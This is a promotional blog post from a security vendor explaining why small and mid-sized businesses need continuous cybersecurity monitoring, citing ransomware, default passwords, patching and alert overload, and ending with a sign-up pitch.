Small and mid-sized businesses (SMBs) increasingly adopt new technologies to help streamline business operations and increase revenue. As they increase their reliance on interconnected cloud-based products like Software-as-a-Service (SaaS) or Infrastructure-as-a-Service (IaaS), they add new cybersecurity risks that can impact their bottom line. While a strong cybersecurity compliance program begins with a risk analysis, it ends with continuous monitoring of the data ecosystem.
Conceptually, continuous monitoring is simple. A company reviews its environment to ensure its controls remain effective. In reality, continuous monitoring places a burden on SMBs who find themselves struggling to find and retain security professionals.
Companies need to monitor their data environments continuously for two reasons: cybercriminals and compliance.
Today’s effective control can become tomorrow’s data breach. As more companies adopt anti-malware to protect themselves from ransomware and other viruses, cybercriminals evolve these programs.
For example, in August 2018, a new ransomware called Ryuk infected several businesses. During the first few months, businesses paid the attackers nearly $640,000 in ransom. However, more important than its existence is that it’s not an entirely new virus. Ryuk shares code with another ransomware variant called Hermes.
People often assume that cybercriminals focus on previously unknown vulnerabilities, called Zero Day attacks. In reality, a Zero Day attack requires time and effort that makes it inefficient and costly. Therefore, cybercriminals tend to evolve their methodologies rather than create new ones.
Whether a business needs to comply with an industry standard or governmental regulation, continuous monitoring stands as a core principle since cybercriminals continuously evolve their methodologies.
The underpinning of continuous monitoring as a compliance requirement lies in bureaucracy. While cybercriminals change their attack methods, regulations and standards need to go through long review phases that cause them to lag behind threats. As such, incorporating continuous monitoring as a requirement intends to prevent data breaches and give auditors a way to detect control deficiencies.
For most businesses, continuous monitoring poses three primary challenges.
Interconnected systems, applications, and networks make viewing threats difficult. For example, organizations need to separate the networks on which they run their payroll applications to comply with the Payment Card Industry Data Security Standard (PCI DSS). Meanwhile, the networks on which they run their business collaboration tools - Google Drive, O365, Box, Dropbox - act as another entryway for cyber attacks.
More applications increase the number of locations that place the organization at risk. For example, most applications come with a default password such as “Admin.” These passwords are not secure, yet many IT departments and users forget to reset the passwords. Thus, this creates a visibility issue since increased applications make it difficult to monitor password security and traffic across the network.
Taking this further, each application added to the network also poses another potential risk. For example, security patch updates for each application and operating system need to be monitored. However, some patches provide support for application and operating system usability while others focus on security.
Prioritizing alerts burdens SMBs who have limited IT staff to respond to and remediate threats. Sifting through the alerts to determine the most important ones takes time yet fixing every problem slows down systems, networks, and staff. Thus, finding the balance between high risk and low risk alerts becomes a strategic business need.
Embedded within both the visibility and prioritization issues lies the risk of human error. Manual monitoring becomes untenable. For SMBs whose IT department may consist solely of a single person, rushing monitoring activities while responding to help desk tickets can lead to mistakes in prioritizing or reviewing alerts.
Adding new technologies can increase risk, but they can also help mitigate them. Automated tools bring together a multitude of alerts into a single location and prioritize them for your staff.
Protecting networks requires external insight into weaknesses. Automated tools scan networks from the outside to detect misconfigured firewalls and other control failures.
Many SaaS applications require web browsers for access. Unfortunately, the same threats that plague consumer websites also affect these applications. Cross-site scripting, a primary vulnerability, infects computers with malicious code that collects login information. Thus, a misconfigured web application that either allows customers to login into a company’s account or a web application the company uses can lead to a data breach. Automated tools scan web applications for potential weaknesses that can leave the organization open to these kinds of attacks.
Automated tools also scan systems, networks, applications, and devices for commonly known vulnerabilities (CVEs). CVEs are the reason that security patch updates exist. When a company such as Microsoft or Apple recognize a weakness in their operating systems, they send out the patch notifications. This notice makes the vulnerability public and allows cybercriminals to find ways to use it to obtain unauthorized access. Automated tools scan for CVEs to ensure that companies are managing their security patch updates in a timely manner.
At Zeguro, we understand the struggles SMBs face. A security-first approach to cybersecurity starts with risk and ends with ongoing security monitoring. We provide metrics that help identify risks, create policies, train employees, and continuously monitor control effectiveness. However, we further protect businesses by directing them to the cyber insurance policy that fits their needs. Get early access to our Cyber Safety platform by signing up now.